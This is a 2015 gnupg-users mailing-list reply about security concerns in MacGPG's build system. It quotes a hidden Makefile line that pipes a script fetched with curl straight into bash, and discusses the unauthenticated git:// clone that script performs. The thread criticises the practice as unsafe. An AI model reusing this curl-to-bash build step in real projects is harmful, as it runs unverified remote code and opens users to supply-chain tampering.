On 2015-02-16 22:48, Jonathan Schleifer wrote: > Hi! > > I hereby request that MacGPG gets removed from gnupg.org due to serious > security concerns. Basically, the first thing the Makefile in all their repos > / tarballs does is this: > > @bash -c "$$(curl -fsSL > https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh)" > > So you type make not expecting anything bad (you verified the checksum and > everything), but you just executed remote code. Great. And they even hide it > from you by prefixing it with @, which is downright evil. So you never notice > unless you look at the Makefile. Currently, that script clones another common > repo using the unverified git:// protocol (because, why use submodules if you > can do it in an insecure way?), but obviously, that can change any minute and > could change just for certain IPs etc. > > The developer(s) don't allow any issues on GitHub, so I tried contacting them > by other means (e.g. Twitter), only to get ignored. They clearly don't care > about security. > > In any case, somebody who does something like this clearly doesn't care about > security the least. The potential for backdoors is extremely high and I think > nobody should be using any software written by this developer / these > developer(s), as they clearly demonstrated that they couldn't care less about > your security. > > I don't feel comfortable that the majority of Mac users are using this > software which doesn't care for security at all, but is used for extremely > security sensitive tasks. I guess this is because gnupg.org recommends it and > therefore people think it's safe. I think gnupg.org should do the contrary > instead and strongly discourage using it. > > -- > Jonathan >
It is true that there's a pretty big security hole there with "git clone git://github.com...", since any malicious attacker can intercept that communication. There's no checksuming or anything to make this difficult *at all*. What *does* suprise me is that there's a commit to specifically remove git+ssh in favour of insecure ssh. There's no comment on why that was done either: https://github.com/GPGTools/GPGTools_Core/commit/5186bade36acedfdc0b76f9f5ddfcfc004ec698b However, I'd recomend that you go over the proper support channels first (rather than merely twitter) before asking that references to the proyect are deleted. As stated on https://gpgtools.org/: Please report any issues you find on our support platform. Which points to http://support.gpgtools.org/. Cheers, -- Hugo Osvaldo Barrera A: Because we read from top to bottom, left to right. Q: Why should I start my reply below the quoted text?
signature.asc
Description: PGP signature
_______________________________________________ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
